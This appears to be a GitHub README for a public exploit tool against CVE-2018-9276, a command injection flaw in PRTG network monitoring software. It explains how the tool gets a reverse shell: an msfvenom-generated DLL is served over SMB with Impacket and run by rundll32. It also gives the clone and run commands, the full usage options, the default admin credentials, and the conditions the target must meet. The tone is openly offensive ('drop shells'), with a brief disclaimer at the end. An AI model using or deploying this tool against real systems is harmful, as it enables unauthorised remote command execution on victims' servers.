CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
Improved version of an exploit written by https://github.com/M4LV0. I used the POST data from their script but just made it more reliable as I didnt have much success with it.
Payload delivery is essentially smb_delivery. Impacket serves up a .dll generated by msfvenom, rundll32.exe does all the work.
Tested on Windows Server 2016 against PRTG 18.1.37.
By no means is this well written and it's cobbled together from stackoverflow. This was developed for use with Kali Linux and assumes the following is available:
This is a point and shoot exploit, all you need to know are the admin credentials for the PRTG instance (default prtgadmin:prtgadmin). Depending on the configuration of the target machiene, your milage may vary. The following assumptions have been made:
- Target machine is Windows;
- Defender / Applocker is not running; and
- Outbound SMB access is permitted
git clone https://github.com/wildkindcc/CVE-2018-9276.git python CVE-2018-9276.py -h
Figure out the credentials and drop shells :)
usage: CVE-2018-9276.py [-h] -i HOST -p PORT --lhost LHOST --lport LPORT [--user USER] [--password PASSWORD] [--https] optional arguments: -h, --help show this help message and exit -i HOST, --host HOST IP address / Hostname of vulnerable PRTG server -p PORT, --port PORT Port number --lhost LHOST LHOST for MSFVENOM --lport LPORT LPORT for MSFVENOM --user USER Administrator Username --password PASSWORD Administrator Password --https Negotiate SSL connection to the server (Requires socket to be compiled with SSL support)
This won't let you hack the Gibson. Do not use this against ANY systems for which you are unauthorised. I wrote this for fun. Educational purposes only etc etc.